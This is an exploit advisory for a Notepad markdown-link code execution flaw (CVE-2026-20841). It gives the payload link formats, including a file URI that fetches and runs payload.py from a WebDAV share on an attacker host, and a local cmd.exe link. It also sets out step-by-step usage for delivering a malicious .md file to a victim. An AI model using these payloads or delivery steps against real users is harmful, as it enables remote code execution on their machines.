# Exploit Title: Windows Notepad App (Store Version) - Remote/Local Code Execution via Markdown Link # Date: 2026-02-26 # Exploit Author: nu11secur1ty # Vendor Homepage: https://www.microsoft.com # Software Link: https://apps.microsoft.com/detail/9msmlrh6lzf3 # Version: Windows Notepad App versions 11.0.0 through 11.2510.14.0 # Tested on: Windows 11 (Notepad 11.2510.14.0) # CVE: CVE-2026-20841 # CVSS: 8.8 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) Description: The Windows Notepad App (Microsoft Store version) fails to properly validate protocol handlers in markdown links. When a user Ctrl+Click on a crafted link in a .md file, Notepad passes the raw URI to ShellExecuteExW() without sufficient filtering . This allows execution of arbitrary binaries in TWO distinct attack scenarios: 1. REMOTE CODE EXECUTION (RCE) - Network Scenario: - Attacker hosts payload on WebDAV/SMB share - Link format: `file:///\\attacker@port\DavWWWRoot\payload.py` - Windows fetches and executes remote payload when clicked - Confirmed by Microsoft: "load and execute remote files" 2. LOCAL CODE EXECUTION - Offline Scenario: - Attacker with local access executes system binaries - Link format: `file://C:/Windows/System32/cmd.exe` - No network required - payloads already on disk Affected versions: 11.0.0 through 11.2510.14.0 Fixed in: 11.2510.14.0+ (requires manual Store update) Note: The patch adds a warning dialog but does NOT block execution Usage: 1. Modify the attacker IP in remote payloads to your machine 2. Run the script to generate malicious .md file 3. Host payloads on WebDAV/SMB server (for remote attack) 4. Deliver .md file to target 5. Victim opens in vulnerable Notepad and Ctrl+Click any link # Exploit: [href](https://github.com/nu11secur1ty/Windows11Exploits/blob/main/2026/CVE-2026-20841/exploit.md)